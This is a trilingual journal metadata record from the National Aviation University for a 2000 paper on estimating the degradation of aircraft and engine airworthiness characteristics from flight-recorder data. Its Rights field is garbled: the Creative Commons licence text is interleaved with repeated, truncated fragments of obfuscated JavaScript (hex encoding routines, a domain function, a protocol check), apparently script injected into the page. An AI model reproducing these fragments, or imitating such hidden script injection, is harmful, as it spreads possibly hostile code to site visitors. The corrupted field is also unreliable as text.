Запис Детальніше

Method of estimation of characteristics losses of aircraft airworthiness

Наукові журнали НАУ

Переглянути архів Інформація
 
 
Поле Співвідношення
 
Title Method of estimation of characteristics losses of aircraft airworthiness
Метод оценки характеристик потерь летной годности воздушного судна
Метод оцінки характеристик втрат льотної придатності повітряного корабля
 
Creator Ищенко, С. А.
Давидов, А. Р.
 
Subject

УДК 629.735


УДК 629.735


УДК 629.735
 
Description Proposed is a new method of separation of degradation degree of characteristics of engine a&: airplane of a transport aircraft according to the results of interpretation of flight informatics registrated by regular airborne storage during regular flight. Demonstrated is actuality of the proposed method for maintaining airworthiness in accordance with ICAO recommendations. Given are the results of calculations of airplane and engine degradation degree received by means of aircraft Ил-86 flight mathematical model
Предложен новый метод разделения степени деградации характеристик двигателей и планера транспортного самолета по результатам расшифровки полетной информации, реги­стрируемой штатными бортовыми накопителями в обычных эксплуатационных полетах. Показана актуальность предложенного метода для поддержания летной годности в соответ­ствии с рекомендациями ICAO. Приведены результаты расчетов степени деградации харак­теристик планера и двигателя, полученные с помощью математической модели движения самолета Ил-86
Запропоновано новий метод розподілу ступеня деградації характеристик двигунів і планера транспорного літака за результатами розшифровки польотної інформації, що реєструється штатними бортовими накопичувачами в звичайних експлуатаційних польотах. Показана актуальність запропонованого методу для підтримки льотної придатності у відповідності з рекомендаціями ІСАО. Наведені результати розрахунків ступеня деградації характеристик планера і двигуна, отриманих за допомогою математичної моделі руху літака Іл-86
 
Publisher National Aviation University
 
Contributor


 
Date 2017-03-03
 
Type


 
Format application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/11266
10.18372/2306-1472.7.11266
 
Source Proceedings of the National Aviation University; Том 7, № 3-4 (2000); 67-72
Вестник Национального авиационного университета; Том 7, № 3-4 (2000); 67-72
Вісник Національного Авіаційного Університету; Том 7, № 3-4 (2000); 67-72
 
Language ru
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e